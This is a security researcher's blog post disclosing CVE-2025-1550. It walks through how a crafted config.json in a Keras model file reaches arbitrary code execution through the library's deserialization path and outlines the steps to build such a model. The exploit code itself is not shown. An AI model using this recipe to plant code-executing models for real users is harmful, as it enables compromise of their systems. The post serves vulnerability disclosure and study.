Inside CVE-2025-1550: Remote Code Execution via Keras Models
Apr 29, 2025
By Mevlüt Akçam

Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras
model—or, astonishingly, even a JSON file. In the post below, they’ll walk you step-by-step through the discovery process and unpack their proof-of-concept.
First Step to the MFV Program: A Review on Keras
While examining the MFV program initiated by Huntr, I considered this study to be a technically meaningful and feasible task. Keras also stands out as an appropriate target to be evaluated within this framework.
Before starting the work, it is necessary to examine the general structure and objectives of the program in detail. This way, we can more clearly understand what needs to be done and how to determine the goals.
Our first goal is to select a machine learning model and configure this model in a way that can be manipulated to allow malicious code to run during the loading process. At this point, the main purpose is to evaluate the security vulnerabilities that may occur during the model loading process.
Target and Methodology
The main goal of the study can be summarized as follows:
- Selection of a commonly used machine learning model
- Detection of security vulnerabilities in the model loading process
- Research on possibilities of executing malicious code using these vulnerabilities
In this blog, we'll examine the Keras model format in depth, addressing a vulnerability that could provide remote code execution (RCE) capability during model loading.
Keras Model Structure and Loading Process
When a model is created and saved in Keras, it is stored in a structure consisting of three basic components:
- **config.json**: Contains model architecture and configuration information
- **metadata.json**: Contains metadata information about the model
- **model.weights.h5**: Stores the trained weights of the model in HDF5 format
These three files are compressed with the ZIP algorithm and saved as a single file with a `.keras` extension. Our vulnerability research will focus specifically on the `config.json` file, as the reconstruction of the model structure is based on the content of this file.
Understanding the Loading Process
Now, let's take a brief look at Keras's model loading process. The model loading process is initiated with the load_model function. This function follows various paths depending on the type of model and file extension. However, I will skip these parts here to focus directly on the internal process where the model is loaded.
When the `_load_model_from_fileobj` function is called, the content in the ZIP file is extracted and the rebuilding of the model begins. At this stage, the `config.json` file is examined and the `_model_from_config` function comes into play. After the JSON object is loaded into memory, the deserialize_keras_object function is called to convert the serialized structure back to an object.
Identifying Exploitable Sections
When we examine the deserialize_keras_object function in detail, we encounter two noteworthy sections after skipping some insignificant code blocks. The first one is:
If the `class_name` value from the `config.json` file is "function", the `_retrieve_class_or_fn` function is called and the following code is executed:
The library is imported and the object is created and returned. Here, you might think of adding a Python file directly into the Keras model and importing it. However, when the compressed file of Keras is opened, this file will be extracted to a temporary directory, and the Python code that Keras is imported into will not be able to import the file in this temporary directory.
In this case, we can obtain a simple remote code execution (RCE) with the os.system command. However, when I examined whether we could call this object and control its parameters, I observed that this was not very possible.
As we continue reading the code, this section stands out:
Here, the `_retrieve_class_or_fn` function is called again, and now we can call a method, as well as manage the input. However, despite all my examinations, I could not find an exploitable version of the `from_config`, `build_from_config`, and `compile_from_config` methods; except for one.
When I examined the `from_config` method of the Model class in the `src/models/model.py` file, I saw that the `functional_from_config` method was called.
When examining this method, we see that the `process_layer` method creates a layer with the `functional_config["layers"]` input. Then, the `add_unprocessed_node` function is called (i.e., the created layer is added to the `unprocessed_nodes` list). Afterwards, we notice that this layer value is called with the `process_node` function and its arguments are also values that we control. If we can call the parameters with the correct type and without any changes, we will be able to achieve our goal.
`deserialize_node` is used to convert the inbound_nodes values in the config data and also performs deserialize operations with `deserialize_keras_object`. However, none of these operations are necessary for us at this stage, so when we provide plain text, we return the value as is without type conversion.
Crafting the Exploit
Now we can put all the pieces together.
- First, we will create a layer of Model type.
- Then, we will create another layer in the config values of this model and call this layer through a method.
- To control the parameters, we will use the inbound_nodes key in the config value. Also, we will add other key values to prevent some errors.
Now, we're ready. We can now create a malicious model with this configuration. We can run the following exploit code to automate this process.
Now let's load this model and trigger the vulnerability.
Awesome, right? Now we can trigger a arbitrary code execution (ACE) with a valid model, and this was actually a 0-day vulnerability that later was turned into a CVE. What makes this vulnerability even more dangerous is that just the config.json file can be loaded using `model_from_json` to achieve ACE, the .keras model isn't needed.
.png?width=1646&height=684&name=image%20(5).png)

Final Thoughts
Thanks for following along on this vulnerability discovery journey. Stay tuned for more insights and security research from our community, and happy hunting!